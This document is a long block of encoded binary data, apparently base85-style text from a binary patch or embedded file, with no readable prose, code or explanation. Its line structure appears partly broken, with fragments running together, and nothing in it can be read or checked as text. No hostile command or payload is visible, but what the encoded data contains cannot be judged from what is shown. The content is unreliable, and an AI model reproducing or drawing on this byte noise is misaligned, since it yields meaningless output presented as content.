z&C-$e%#}^^V(4i8wk1}W0z%48n){a*)ccl`<30KjQdq@s?>{JD#qE|1=t@L#>UpP;K7bm>ZkAQpQ4vG z4NJ=gDZNs=cqd0-Eu?G!*>02BDX#P0se%1e1GYODOHAmY)}ve@bbKI~0MHb$*z1hb z{-L+Vk6@)hs2wurhxh7-cXXsiXc{h#KbPDa5CiRc_ z*VacNXJ#s5{XZi4ve64^m3{4aIyLY>Y5;ATK%&3$2@rf}8#{%4)zl7-#bUZ$hup5& zdWHB1!!3DX7-J#Gk%M(%d!4z@sZp9>2CUIpIprr%bIml1{lm2B9e{~X_Ocb2yX2m2 zT4AFi6~(eNjY|8_>+z+tdW`IQFZDU?q%(QOH~nfE9=l zoLbGaInDfW>k*v-YhJXC%;H`FJCCo-Sp^PJ)m0e00*a43hy%8}`~>7KxzRs~cxvoH zVU8{7LADCEJpR}rcH?ZmcFNnm(%(&97`D>1G}#Q_As*- zy?kFIKoMw1M@O-j6^1y1LA48ATU!fIg~1Q3<B;%zkLg~z9UW2fqW%FmwRw)U~Fa% z1}bH!&xZL`~VTxu`TVUCZ`*W)>nP@?J+&^7bw7mPO-nTIzg+MEC z+|D(St0kV8vyxnuiMeTsqXAM8$_Qf0ce0%c?>FxS^&E=V6e7 zzgn#0@-U4WSd8PTTobSi6~z6u%hv%^Z89)8sGvA9JgR$YdwY6u0LCILhWP=SAy|@{ z!#-J9f5PD+tu1XZ84B*Wu2z;87huyH*3@9a(F@zvqoWgY42M2&(tGOEDf!^s`>??d zGnfF-2^^ZC`((jQ)1EmkkByB_$YEFH3ZdjKZlar@U!7h0>4#A*xwq1-z7M0}ur2+r|KmbWZK~x^buv+?| z9>6mvSPo~q%ZjBqrUurY`dfR{JRA%&f&yE_E*jD<(=@>;gf)WLN}`)VfcdJlweF67 zC3z?gb8pmbk1M9M-F>BH-HwLy&Z&XQYG89~gYka=Y&G_la*QbF=-=4T2s4x2P?ncT2U_6KSprZtw@C<;#Fz>GSaK1D7y8jS*IVSW<(<}i^A%&EdG54QR> zHq;w?>qut~Al}i@h3eQ`TjlEKp!+$TZKYqB<9@EanAJ@ik+WOA*uF89zTF8%O2gaK zxGYqOV=&W!%7^}_^vhG-+P9FO@+p`4vW~ZNcZc6D^xa=)d+NInzkTW-{q0^Wuah72 zFLW^011G_XI=B)*-CKYyTLDk$p*?D@(-I)LW=jx`!`c%$TiT80UUo{$Rv-rULNrTY 
zO~XVgtvk`$Qv&g6f|1V|{M-O|a?Nf4oga3t$yKid7?roidlx{FV&E%RufoRh5^Pm> z%Gsx%gmtNyDpI9kcRGgS9|_bxh_lyVuib-FehA2Zn0-tENhv}mXUfxfc=mHOfSLig z`b#357%<;FD1wd4F$1VS5+5v%Bx9p)V*u447e+t>~ z;583O2t)AVGqJn4`WTNsN`rs-sLM+Ti15^O)-W2$q`@epw*sz|%1mlS3Sw|_rgVlT z)3^5~KP1k7ng)eWn7#_F+on?6+qJ zY#-(q(}rJ^ptjPY=h9mzd})nre%@>KvpIM7|7ow4*U8VWzi}3)=&;%dJcc9W1AfJI zsrMQxM<4eTXAuQ8aL!vJF&stKyxM#FzHl`_i1-LXz@<~X#lBrXK^)Aw1(U z4mG36LFc>?A9TRkyAXeapo$m#sZ}b3)!b0)S@W&YHvQpyb)?PAuugWfrfcKxlj~!# zW@~0__x44$YABZ4N1?5)(GsfUns1$z1V$Jq{Pq>~pzCM*)Ia*$2c3V1{`TLfO#N&( zUU00SMsW#Pc(K&avsUUQ<4fjdJF34v=R5D}A@tOX@A{t&o({+9J$o{SDq<;Y$d2175LHUb{VINu%)j^e~bL+;k0GwR8l|1eWN(fn<`}sMT0HR zaVo|eu&d?Cn zS#c6pR~Ob#=k*NPFcguN7Up$}3>BC>ZojU}c6CAfH@b*5)TnM1a^c+TS!gf!A33b& z0xvBr=%Mb^5MITeTCT79aWW52=kega2HS>aCdZ)wl|cLuj_HKv^4O5fFE2@LW0Opb zPf2fY9~7w?^nm$VC|Gg3P7SsQC9qCgg~N**>ccX8`wpNI%3X~SdHbFBkY{KwkKDl) zq($VpUB;&-BmyNYo{xMT+SZEz+SSz<4zFLp#3HCC57h!pS5{)!p421>oamDP;MdmH z$=JxK*2l3EC#7+>>$#d} z4By$!+O`9c29**R7q{qG=1cRwoJJD8x7@D7!Ju?NP?3?wGK7o&=E2$aeiN?DE(49F zgJmfxM%@a`_3Q*o+a`<|?pEQMpEC5f0;@^}Z=0%KwY+!dXRGp>BS-EIuLjgN5zaku zN?s=aTh)&mTQ8x*)XELs3}(!3mPBB9M6&HB{}%Zu4zKOWW^Rl6SFkG1zb!hHSjsgk zQ$P6>3pb!&OeX(gi~864v1zIB5anV1X^cMS^8JO+HV z%1gjWpI_%g&OFj1223Iy2YeV2RV*|?%gtrWAs!V2{X;P*;(mmYn8FF z2`C@|7{M_&HP*|uE0?9Utwa35u=s0hFxI7Ia%xHqRHTy`IXpNZBiPQ<*xU$hW1OK~ z6Trdp>vHbg2h!i)FVoX=0LfLU?dg(naIQ(jZ>+`HxY*v4h$nRt9e@H>0BN!TQ`zgz z&}~_au3-H1AP*7PG=_GwKY?*Kt`me2fN2xbo1b66wxLywn`wabtd6%66H|JO9*-T& zq?0-}TdqA{ZwKh+K!PnBI<@l>(D37xoq#`85C8ykpW9n+y`^gG+*JPg&wpOp+uOCH z*iOQ$0aU~J7JqZnq=_AI7$EOfK|@LrXMw)eu{R-z3*7inkTWqp9Rvu7352gRk}9e6?+CvoD^s zEf`{^T`>f|?_D9)qY7=1t~eQzP>VhKrsPi%7#6?bnp-(nN&Oe{iCPCIly^mi&sTH) zrMW4=-~8L+cF2Bao#BK{8ikb5uT4g6u>6(b3*qwKs88#Qx-F0g02IP(dckI!&us2v zAYSojp|m0i;NsXou)W(E&Nl{;=^Qw}?w&pw9UsT`85~y!02>;*gE6R0763|hbsO;W z%C#HU^wcbFtBHcU4TtN@xwQaI9(mUYfSpEoZtJIjsiSILzMUt1l>5NHjKTx!^6YaI@Bm(Fc<;siDe(6q#_6|c4}f$>haEv zas{z(mzJj}_6>(=Rcb@-V9#x&saXLufcI<@G=8CqSP%`9tL0caiF|Qy?i}(=(56^= 
zd}0g+Jpyv&@@0AHR6xfGQeh3)`nAD#`Mqqk3a^}FX^MOHQ`-7?H0^E2 zIcSCToU7$r=&iqLGPw@GtHw5$GHZ{h3RN_MEZ-g?!rIZADa_V1jOn80qw*EU9*#Tw z(YXkgkj`DXdIft}JFsuILH+I2Lg_*|iGv2YX*+glApTL(W=vC>Il2glSA1zEAzTgC z`L_}@%W4eIWwcx{lP`obB6J=$&ser(`J@!MP41a3av7#v_R2hNC4$$$`~1&=SCFC& zQi_M^SlBge2%nywmZL|H%F8dmtg|o91i$&sZz|xPJb6;X+s0W|97JMhkE-YnmcukY zHm}_NI&H`dRDsKbU?HqFcJ{EG#89Hu zYKN3vQ~AgdG-c$WOtbpPv@0V}uD#JuE2c6M_c4^tHA_FoJ!Qp4ve#TD^WWVj!uKU% zY^Nqh@5j}G;+C|wQmFW-h2Ap3 z{qv%nykr05ew&=KQ4nZ(W#gpddIZHhot>Te^;mMR0|NuPzRQ`F6#;GAP%Xy@niL;p z(;MKDF{4$BDqD0m%|XeZEk;F~Hi0}2(G;(o%{p#x)&Rc`5pKIL&oCMeMd0_f-?+F$ zY^PhjD-Kug-sFLA3>Q?6ez|z}*Ux}Xaal>fSgdX9fd2Nrw9K}@G7Memd*i$FU&}#S z8e7FE&M)t6dc}1}BMlro=nNN!6=(g9TTy+0{-|b-ZI+Q>N)-80{9c^r2bcqg^gYzT zfd$)gb-_+dlV?<7pn?>iDQ2eqPl}l7iU&M)Dmpe`+aZnFGFWhdg%urLIlgEI#Up|v z=q6`7ul3A7GhS(68>r~2$7PiXm*2RKux5xWisalr@ERb15M$Y1s3^jL&j;&2rcoFm zQ4t>65WhJkE0m(}o=X#))G-d9`NJP$m>ws-(29@xRagp!C4E{D;+Bszwo_25!=^~% z_SV^fnEu5;WZxI>w>0USNveHcxE5#@{LCHmp>+bYek@iMCW$op$G)WbL_cF6VjgHT zpW9AYUModnTq-p#LDQ8Mm6#_k*HF4s3@)YVmOk4$;kRL2HImOj$Q0|Lxcm&uG&v?v z`o&XsT3T9^Yt%6S-}=U_TXOZvHE@*p&dAT1C(lSz1J^0Hu8Yz<-LGfEA#bKuyw1J( zjq|iuYT&T|TXrsX8V*3T6Ur-3(qPBtdItwVJ#_=&wsP!{oZ0FCL5`Wj#WpC%@Yb2z z!ZXvQvxA!rSGY24xx5t7D5778SA2)~$~iNRQ4VAA3`i8{6vuGxcd7yNP5Av*R#x%- zAPIpu@3q%n!xoAjIeP2}+7yl`%K=URTAcjG49}BNuEJa%+Z)@_>C>mR&DnOs!G8*x zqd@?%cgJs=%O_~309bR_HgfakO*w=~r`g3V6VVzYyG7KLW2*Xx7A%?Qekr4@kD$x|ma z1k1Xb12xtp?d+0%Z(koKuWq&bJ2W(u1KJwhK9WS=q*4vnCU*n2EYsyHSJd$T;NYMf zI&?@UIm`&PcPY`*WhSIgTf?k-PJ&qf91m^*Tsa9h6O<|#Z^(gy+%E@- zJhxy6#S(Ea6#z0gPK$t<#ekf^MsS`X30aR07##T6!5grzjROeN&43myw74;gHm)4t z@|^)s<|hS3trX6$tcD0XKf~4_hK4;SllfW0AjcUojf?9R2b)YTHRfTv^5=p*<`+|G z6e<4T2S3C<#-Ma{cj-XP4f(uZ#vaBW{NM*F*8B0F_zBeuV4GXUNi5`^2paFa^Nt)j zazxu4!Hw?;cHH`5moX}>=rx=-`r3EC1E4>qKzs4xMfu!kKZjNV4h}#p+eo^*do&#DhJBN9NT<>^$_WOQA;+JEqZOO78IGOWa-X)9aFAffBet>0gFDqNr7Md_b7>hzt06BJFI^NbxM@zl2(+XNR#g@OCg(3) zkQZNi2}h>|<;c+^@?8Kzj1vbF%mDsj zk_mzV5<9USJI+|LWG%KNO5DjNo89bv-(S!7bL!T6x0~I~?iMMLtt#^My|1hfQa$qCe^!!ka(%zOK29 
zJA?oF*T1fEbh}x%=U#l#4-mbryPt2r{f^`5^yyRf>Z@NAER@`D&%v;N`?r4EKG2nt zLu#MvQo?Xe${9ZQxo2$tr5CN6{G|ASl^(|1g383?6qL=XjjF3TQC#ic)!NSJ;bYc@mRZhYxg%&`*h|kIEF7EOAJ)OPB81ee~gFO)?JJ@#Duud}Y9Tle@NS z^Z#sqIWb<50dOsm9?~5_)XX6Pz4ZAPbe~ZQ0knjA>9gX%4l8c7m8Qnc3IX z=_lde`{gfO+60UAFZ$=8;2z&1f8P5F;Y=dAtBD#vmXBf5<6_XP{1Cof#{}@mk)yt3 z{lzbQLDHZkLowU3)8IkMh6$h714+yf- zb69Oby%@JAP8{>q1w`m4pL)`nf2~AzD=M*_9(O$KX=Y2OX32I!>dfAI?>+n0x4z{wclK~t&VvXs z5bsJm%Xhx>9s7rW_y^zX`sO#kY3I(J3z9~zg=zd+5vFBHHxS6!2^gr{E{hJS0+nW% zqZ-uG-LHN1%hJ;Fo}`^-!EAFveP{5d^=R2~QG@^Ht=sn0*(X&VNjwaE{c{Ej$lS^2 z2%jfo9Xbd>ICx;cEv-nSl{CIAOY){pUD_Lj;a|RTOdE%_^0?hq6@Y%-C?;H|KF!#GA=0LSh9X}T2u@yEcPS89PI`&WPUSN4M+{J@ut zk#HeK_&xWWY&vSs_Rs(P&+VW7>7Sf|a%h6(Kky%WOAL@WNEmqYuGC_|4}#DI zkSrhwmCNj6y&}qeVxsJm_4FLI{yT%#bMlP6^~PIv?&&9NVDPr|nAUl?qKZ(@+VP%V zopO9m2B^cK3y99d_>2^EqaIC%Rm%NM2}G5yT)rlv(Bhh8M#o2_9Y*C)`9JvJqRmXt z*;l^&6*1c@c2LWO3-cm=+DE>o<%MjJ+bbX&JeU;!R#? zfAKiEaPW!mS{)>Ef4xJjV_%7ylL*U8G_)k~oY@HyOw;uW=hEi0cRrN&$h|MC^Mr|C zcEVW93Wl982hr(Eo(CTS7!KzJZc*u1f4-;OYPRCEzmt zHO8nb`NTH#lq%?ywwrL(V&IJTS~1&NEo)OYuZSLj4xrRxhqhY*oZOzq07BoMWwulf z6=Z+$7k^>j|Ni&=KnO&MSvx0>f9H38$NuP#{>b{p4FBX${=}tUCjc5fNCL->9kXwL z``fE9u)uJbz0%L$2BdvE+7hS z>%7Zt?oD2XqL-{QY@BmG;@0ngaZu|s_GBADFQ?c5@PUG&mKOl_zVQ#BA51E`3!n06*HZ%gF4PzVpsI&S=?_ z^_jH>2n>aafA4$W^Q9mdGI#4>Y)Aw+q~F^*>i?r3{m2iCu&1@25oP=^!{)t%lqK1M z7;JrYxQ`2bDD0}f6_OEK?m{Xpl(s>Vl4AJ%zZ|$MmCvA&4Dt?T;-ux!33_0QJ~KD% z!I2el#oYBQDNNS`tr~M!Ax8zrd4H&LR-ioi^u8qqgx}asWn5Mglv^ss$%4EMIq0^| zpJ2MddIub6`G#TlaNwAF13)oo-P6nInXC)&&)7%uVMNZDOx}CTchALRtgT1IKPGpd zwUI&)Rk}BNOt#@OOoHwWiYpHHhHRWcX;qV0EvJ`tfvYUUWMU9R+dQO=VdP_^_s=E< z_AIl7f&Tc%KX%56M2m|{YcM|caXA#ld)%XnOMQIvgW3M>@BZ#Rd$){xXOa*dab1^K z*Nw3tBvy!CSe7DH7^Z>PW{fV21_=wxdz3b~f(SV$oT0WXzeN`(4-ETN?Sa8t18kzk ze35jutf)UQf9mQ?pE4^x?}b8G`pa^Q;L~#l7zkM2AOX!)X|i&J^^>MtK>0QQvH^$? 
zyz_uO*z)_PU_vJ?$E&<-o}vhjdw>&f*w_%(D!QW!J7_Xkd6Dcsn2s8vgU}@USVSwJenJotxV4fU2VILNUA1>}ou?!3&j^A`L69-V{G-lv#!qo4SQ|MZ;PbPM7PRTVUfWSEf9uKhf3OwB$@jFO~DBR zpBW6S9f0gU2cIx`h10E#kw*+uh%lD9J{AsG|$fZ2X%`$c7so{m}9K)Q6 zYCH$OuNg2Xi ztF+u5-PriF4uUr8+(z6ciXrLwX<=Z`9+09F!*to7b*8fkhT{NQAB;bHwee(U3 z8`v=9z^KBkGA`@HxVwAiX1fBAFFS)O%vRSzX8AeFq|9ewuIn8>ajwgm%Mf3a1SbIj zE^v}d7)Th{9tK1Te5Cnk(;ruNsdFE7q8pKEMo6n-gxtga_t$^R8Tcl(y^Om|p+U!UudZkKkvfBEMh*?;`Te^9s-^@KgGSd{eq6fm%-4@gDH6^8ks z9kb9lz*aP?<%BOkzq9bbGV>gK#tTT8EWf-fGfzeJ@Nxtg?%McyhRoFmXSRyZyC>5h z(rm=2^LeKCgn`d42EtegBQuPzYE8({h3 zRBczTUa?MHM;sp;m)`10G0ZwUE$wy%ZF|j2>CMesH|^HIkoESQu)AW&wNkFZo%soA z;G!%yZ{D=A)-mhTwZ6lL4_bp(^^mW*o|I9ljf<3gKT!;9w&wAP7UHqYOoNP5zO&Mk zJ3KaPv-46a;az{D+H5)kH;OF3Fq|V3BogoULcvGuQPDk|sdnaInvjM7Da2u^3CAI< zD3SZS{P>Op!y~0X2?GfOYcRk#^X1w&J|(R-H`dwyjwWl;UF$Fi*CZ)__)3{nK-SjO ziJ3xnHQm*rs!LLD+0anqQt_B1S`?48OY0SP{n4B?EhQ-X_jlTYRKE_742uDav5UD6 zOFwgit_03WH}=rbU2BrU4wjZX+S?>0*I8#rs}6_Gs!V|blnatxJ~a&N*=6L1g;AIi zO9Ct-7i#P6{r(xdJvb`e!*d!ul|7ROm49HT_d*L2Xb6o<;hBu;kqNKt@xpAG9E8PV zKeeb>aj7dVRd07#Za3b&r4BxoDZ$1u68w$v5`7bXA|^I|K5+cR4h!HoAoXPKTCe5b zL){(r^wB0;)eF=Rz1x*0rIhFP0NZ+3<2H+Wq+3pbMd1hPE zEcHhp4CxN*sy)@yX|n!^}y?cXXRE_!yp^pB@JG^q%d*Mk|brZoar&Wvx>1 z)ZJL^`y}fJJ#NaYz_Zs2Lk>*ZU+rWH<}aZu(`W^p5+?L9Z& zpV~P6PFJ)N{EhJ#eG`5nCN_RPDEz?C%405hp9T||=we$l-g0r*zAByu zL$Qdm976IVac#`?UyR-SwV^nc*T+lWj~)inp6zbhL<1!bE0$zYI)M-SpW7cc8gI&b zy9_txx2CvxMoYl@Z(m5xv&X(`Rd|_!C4tU$)YFjLUaW^`-&snFl!WJ>*kKF9@Eut8E0H{y8k*@a}Be0ZAJ7 zDYkr*OBhHP*e(Wqyel%}h7pD1xz$!l9IuRLVxtRy*D&@OzX4ACcA)9cp20w3w!3Ib zmW|^z8eOE(5Ub2*hlWP94^z~|^;Qj@g6n4H$pGR&1jqJkqG5+Rd*OR!7GH%UAJI1ZC1mvnEb@hmiA3wn;Yd%Xlq!AdZ z?)Ay+AMjAZfhMeF#a&kVT3tPuka30@U5f9LW*U~IvT?o(Y-~RXOKlI+CHPxoH{s{O z;m6sfPq;POWI-#8Ilr zFi-5#a<>j~V??r@m)b^_sgYz?SErnjk{^;P0~4l+h8ezVWbSWh zVbPiJ{QR7U*So1c4SHQuB5s`+F*EGs5(W|mc7_3DP#-x#7~S?LV)Dyxcz9S>e=fK^ zZB)yiKYw21{ZKZhbq3^ zCe9!okeW6I8BDra;Wc8q=vbbYwW4A*rtr*`H2dYpcSmQJq+3bGQbOJ-X>?|G&W*~q zYq`3mrAd--wItUC>u78B?@nEapV5VP($`CBMv8?2cj`_buxph!(zlDW8Nqm5v7O4D 
zFz`5FfJrc8p5M^WkUw92^;Mr_4@xr>>R(Yzkw0zxIMgeZaeEj@%yxTt+Ey%PqcGPQ zX??*?E)GQ!OIpT-nev2jVu`3I1>#4f2eqlW!8N^9>jFC4r?qu8Vwy5?prxs5#chx_ z7^K?1z8e~xwXRH~ukWU`%5?kSWMBfTwq8tKI#z3>w7jlP*O27j(a|o6xzU%FtBE83 z8Yw1cK(nk&Im3Ri7Qqn3lS>##7`(;<8=T2{jO?_YeDSo!VFQJjHx^Zk^WoD$uPKx+u7Awp3OElH`~eH9*UEGhF2<4taFV<0ix2iU$aumcD83u3tX!(k{G z8H~^!{Eg4-Te~+}S}wRWOgP>!=sI0?$02PJw;%}@%`_E29_)X7@QQ)5`&y7Ds~E>& zaacpifZ^)i2<3yo=-|q@O49J1{w5403~Y&k{4gRS-01^fg1`-Cg#sJKA@a~{}_q*S<+qZ9fk8D=A z5OD9j^Nus#=bn2`%zHgM_bBPlV~T;qY#-BxOT|tYNEmp0Fu;lzhZDQHy6p7n(|(Vh z(!*rAU(Z2F;&A;3o3?3%?D1*a?Upn#+wEd1#Y-4S7)Th{B?e%$M~@!0Kl`&kvvDb@ zftiK_kl_hf{Mf6-PHl2~4+DwW?!7imHA)yr7RxaxO*VD1b26L_uy_}aCdhd+}+*X-Q9z8C*OVRy*Itq`Eh3EoFCO)-L-31?Jxh` z#$@W=q~m`yX*wc1xv=?A5)6cENF1$=n2dYT)s&SRZ=7BKwweBLDrd;#wo?`%vd z?!VI^=screp~bu;*Z70FNsQp%G&rSC7)@r1VY(JK)F&NrX=|&AHV#(IC8U9xWw{j+ zvHOw*`Z9(|z6UHMf7i!GQ?YXUpzb;;<-#mCQHcNzWM@Jc`0=SJJkv-0)?)!%OG_G7 zJ=hd}_yn`j8*lH7Xr)pf>COCKk7^yJpSJ7vP-}B@ zMrM;44nnsgI!@H1es8$N&Zo1MBT3208*Q!XHo?1r8_(f!>~ipH`RO=&5AH=>Mbalm zOW5j5t!;neQU9%mf5SQeoNTDD&;*Z=urUxCsTG}*i|aJvx3JH0tBBn#?ASO?#KLS@ zr&@(xqg^s)az$~|kY#v7BgrAHy&=GGFpP-6U6^9T3Ais=flRp9tt}y!YTphb#Az5A zTY-#AR{NU zHol*bn51@Y#_zcSLf;IJrua#PZq+IpD;FO}-gG}R1>3lJEE(IMGIZQNdE1_5M7Tf4 zSzUGl;S86hT#knY+kW5FI=f!gwY0dut{-LHy@`tc0jihGI69XjAR?}!naP#GH=REp z>46dtGtoe;YO^C#pr+yjvj$$;%XPp;3$H#jB0-J6KQZGGh@hZ9#pf-H7WAshDzg0L zpEdk5&=daG8sC|=<1Tjd78Vv)K`BsRW6|Q}W(Qt98FgT3ss&DRmlbK8i`@O=^6_!X z!~`SNrG=Jq>rO7p8Sg@QiV8b3r$w%{ zXQC=qlN#CM5^#PKj&5jlm87BPVtw1i>e5G$LFkTuTFX zR`&eW;{4rEtLWI)EF>gkSkPd28@af-Nx|wXGs&^0sby_qF~Y^wRw462N3Ik#St*N$ zgK2cdYanHK`1>k3%`! zxh1WTwBLyK@{=^Z#S)(C6402#t!1k7Y$^zqiL-W%?n+?!=U`X?{=*d%W~Md@Az38x za36T2kVT90^XA3%LGX3K3cWlnwn{PgG>whyJFQb}{#=RDFWV%6&g?A|tKR(L0b>F; zBXZ~K*^nyh4BKj`#Xk)|o2!m91Ur+V+yuDzJ99|HeHv5sPi8Qs%(w)uV(vPBg|C|1 ziiZ3CXJxY3V?!QKoiryj3bb}-aW=Otb5D5wBY=fJIWZPL9r0dm(OI82!a+O3)xe0i zcWrPwax^&>vu^7SuZJQ=tV&iHeo{vpO{l9g{kt(OJKvf~sCY5Dmqc+G8VsEj8ne?) 
zVj-z%e^!GT{x5v?d=12a@7K>L7ax49)JgzVD7p28b>eTcZDS-!b)lPtB}hoqV&lnb z?*PoZX{!MfjHqk(O{dgNG}_R>Xd)cx_6|dg7-F&ygpcuwSWGf*Ws)y)!TI0Bu{!CX zd8SC<~C>K6MW?zfdq(km3j2xj)SoGya6~MN;x| zMXU<=DVH+E6L{cm{yOmLE{>Bo7-3k0jyV>fhLiB(%}HbO_;v%+=`~okGr*C{2d-+~ z!RAo=)O|FHAjI&S{#xGFCKw7D-=05TNa7C8DZpxVX`W!YY*k*I2duGFD69kPvS`K? z9htdqLpZF90VccW%plRB&15b8#?e~ePW9Sgo@Pr7F4!_XE3+nd1jl(^WvfX?m*J$| zAabj`e9ofl%L;f04ga@xZ+1Qu_b<(`XWK|%Zmrm zGVw(~Qm&@8kI$qW;+OC~i~?XK2%aGo)tTl)X8M*s2O}cOkJ_XWLUHKa8ao$K#~MKV zY4V8j+wDspB+8$aU-HXNB=pd-*7E7P_+!N zM$fv85fC1Tft5^PXzg?~Tdl1gUE@Tve?|g}Rj@rZv=ehaq2u!kSaCwuJqeSV4 z=#N7SwxtCk;qkwjDo9yt2bU;mpKdHq>nkZK>ADOFIn{kDysqT=p1|{Nn-3s+PD)7f zPz>QZ;4iJ;m(przqPjTGII79BPe6|0U(P?T7l~YT(wKre;4Y;l=+;#Bv9WZmG>(B< zpE1QZ^tVw&T1|iBOqdmDE0=RHO!QhylfYYbl&$s?B)ms+?e$!D&7UwQeHs7qu#_or z3mp<3prHILd5^Hlc1S(KW@p06O%5Mi1?EEVV=?f= zwVrL=|1~eG>oRY#ybJhL*F$0cx8fqLJMi>Zy9xa}%jI_D_#cCheWXdZ#h>ivzRv4& zadxbGvTi%_a{;HShQBIs?&Iv66b<80sJ`s!k>9ocL#xi1L1DZ{g!LXbJdi1v{#gE3 z1Jr#Olmi>QR8Wp)pd#5gESn0H1~u~JM?{trZb_bHW1gD|Nk1(tmeqVWk|zhnp$-ZB z7XeKaKa2tbY%t*l%^+E!R;qxbdD#=;$1f8!Eb|Y#^CoVyG?QTf4F!v2jOhB0Aaz(% z3CN)_@EO%CNt!0ha2i95h#yjI1%4{ua(k(#SR4{nl^`+Hgu{bSVV2KOHpWhiS;Bi5 z_R8M?XAk7S>)xMk-|0iR1;Wj{fMI@>VNZQv!y)zI2|D8|V>BsVRhWsY4;XG;wc80w z&ZtXD9cS(5^S%=H;oEx7xjf;Zccg>Z{oG>(Meb1N3C|h zMqtw)SMB*47 zcSbYw*oUwUx-!8i%Xyh|`2Ye`>IpE^c!tskM=Ud}`sBE^7w@+J`H>1GGL%IMOcP* zZ#UGxvo}P+dB2rPU$bm}l?-GdEOifBxSu5x$;CB#LzQ39GN8H@4ZJtlgdrsg5dDo7 z5_|~aFfiOfx*wb-#3fbW9_EfJ3$aLqNc!mzV0*NUvjyKtlg9@u&ty0@1;QHd`o-Y`v6hGi-1rq_JH!YSlMi z)-N*h7AlI76hCyYB+=>PQE4dolK`aatG|Rm+JT8l#wwCvx(-o99g3F$Wo>1R`N!n; zBF4;HdG_+i`B8}4v0S_S%3PR+3*_^T+WrPyzcOLt!pP*^TLF}}0+Y^^eh>1$IqhXS z%K9~^~6*M1bWr&u@7c_z*#y?+1b?v+4A znug%|wPswRz%!Ij0oKgYu330>(=&JHae*ffPEgnJkI4%VWpP zR3S1o_&}FO_9dPP8MKOR`un4@4Sqj^EzzP%^pyVa`*HTLtx|5fN+jm>ZS(*gnqHUb z$3$)BpyaHPyP_e1BtpwkyBpvo?GsWNjmpM_ktC=xdm)pDaFct2aH@kMjcXY2qO%0Q zN!+2tSbmT2n<^gPm7j_re32Sta1^-?n(QZeW{}9Z;nn^+W6TjY!AB?OOWCB&X}GB? 
z7u}zI48ZH+6~#edn)*INEw`|d`BwW=MKbmH2#qcDb+d`3S|Gw?vi;KCjcXLwlr{G{ z3?q#2gX{8ZXshaJZfhArd7|rbowBX5x{Lca6FE7w$MS4Up7PfPQMnlCx*#3yLF1hl>8CKCegO5Dk0eri zHHm=vuogMe6}a_FI+Oe$So~qX_1N+9hLk%PO-r3rBsXBA{joI0dWBR+L$yNM1LDMA zANtQ|b9QFt5~}V9V}_HQor*N3cj@^>Z4+!nW25Ro1rs@T;8jDIM1-8QhLlwL)!di# z9-`EXvV!iDQk*Scq1YByzwW|&!UBHA=;HVf)dOB8CVi0hs!OHNGmWxzgr12$YPZR= zs6~;5rS+_3^@4K8 zbo8rDbEws;V`KSGLGk>-Lh^9%3OfO3aa5@^QOUXvRFJ}%Uc;;$y$~}{m{MhPv)GVE zR*QVqL-}61;HQB5aNeXM+t12`Swy;EmIJHrah+AC<&N)yC6L3e*GhL)~ zkA3O&NRxbaAKSP)m&2@i#CK&p%KAuSG({nfv)L&e{S{&#E1)$Y zWP1EIdRcPjk!T^OI_`LFM5DD8ufV%ZdkIV400(8(lNTv)jbnnCIT$S10n3FC`dt3oqI z{UyXQu&D{YacFb7sby<&4r7u%VHyu0xZ-43Ud38;JiV<&v@kDmt!ED_omyt(e;W4i zlnZ@kQx`JoxO3(QQ`C&pY(#1EItaVZdejVj>^K!cH#_2JRy=#ntEYWu!M3lD> zQ$hKMB62+(0Y^)k;ILLA4|UAO-rHykblK^JZe(h*)_Y&5is?skj1(VO$FplU z(R&_ECMT{k_XL&*QFHw$FwsisuC*V?r9m(4>tE*9nl{J^bztU2+^lXYqU1-EZ*Z=s zmg|{5+{lb|=qaBuDAX)1pELMzQS-igLHjtMHbtuqopoxNAIkM5O$v`gkx{}*&va_1*H7jZnSr5h5$PTBcVtIt8siNuexJr=`o8WlB=&vU)g8K z%3irO8%Ocm75aR6CXl_NPxsz%_3-_#uSKzJ7AnML!XM&>cnbNFi@g{$w|xF_M{()q zy_}hYa49ykE3%z!Qc!vIczOL6(r7dD*<1`f_aWpGfyI0*JI6FOdv~c_-TyynkQ(k^~Ge;qA zJ7+i;KADnqKJjyN9@RFpTsb{Opvxkh_w!sSjzh9Gnv>zsMPEP4^503~#(6-5ec~i-7mB`0UqWD+(+Ybhdr2cj@VSzQ_dMuId5OU_pFlu`G@$hNO zEi9;#TltPkZ@v4u0VhK+I5={N9#>%TQOd*CjdF3f)P(6(hvy6zmuAJCK(bEqrP}EAed?Zzv=7s` zCUeDeFnQbW=O_YR5Lo+h8`p4pf4bwX!%i_6ILcxG1HRTS>H11EE_>hh|0n>SER!Hcw-& zjLpIu-Z^u&Tdn1-sw;DHSq+oy7pzsiC2HrHuKd-3uZSh^X>N2=RtG}yD9nT0u22;+ zr}wg%oYd>5{kLxsr$sR10STLWE!JY5h--Lu9px&K6rKuUN9hApcI(G=oWV;!e{e$( z;DR&@Lt!#CMY$G2O=PrRZ2z`IZCU`i=B*t2LQQ|4IFh{h{UD5lqeSS%X)8yIM`Or! zB59^M&n(et+WBETI@Y=d_z)LG*)!RP#ub3M%Xo^VbD)_o2KbLEUnA8z$M!x$Jp55~;zu$$5#^`akI zuj=zEGCv(WTB_Z(`W@zKxW>q*aNk(2igArW95r}*LDIttnONk?;uGkjm4qJlqlM~= zI(=z_?lUv5`J5y1(yvEn*Oq#AItm@i&=^`KBa$>G)ynqnZO+nGU*D!%jf8uiizB0? 
zWGu*HvOg>aA%BS+M@-engFL>EGyrm)9sJ~hdGYUHhHOqWA0wRHc*55WcAN2eVDtmWx&j)x{Vkj`%2HH zX`%{rdeGm?z_PYxFEz0`0(4StmvJHzG7I1W7TufHl3q^=2GbTfoB#a5T7 zHFiLe zLVEkK%ejFe3sUtwmFzSC;@J=FPndJrv7OQ6&b|d~Jq3CG{g?TS7g$=Rxiq@T(v9hh zvBdA_TSk$8V2IHCa2}$AMP$BYEI~e^txOlmJ>cZ=S9T4hnikgja$!$DAqwr!jeOjU zVf?1Ic$^}T_)Yq`{f@G>q+EUE$<<4klY+L$y-KD-52*g-KUn`cnyGM^{7d^#SRDzU zBZrssTgAzTbvz=SRjeF*r64MtG2mTuOAF1xhzRQo53%Vi`M?eu%a}@)X9P4^DG&g@ zd5kwNSdsV5CppQL-;w4l3!WNP8?DqQ4S@)fGWu!fhd@EK5{6B) zcq3Am{b6vt%#1tk*31i_A*K@_jQT?DgH~62?)xk!5H_QF@0IKV4*D()y(g%f*R7qI ziH1V4nt|F?E&l0)?&7zro4AQi18cD?2ja`C3I%g}6njGl$>NE}`0xfXJy5rXL52{K zkk7g)c*}&jqpz3$b$w$4TKm@_pILYc#_Iz@+@M^3lT^z%^78qtqb{Fl-^EtC9|zZm3q8M^&2iB zPGUd5MF)yG5( 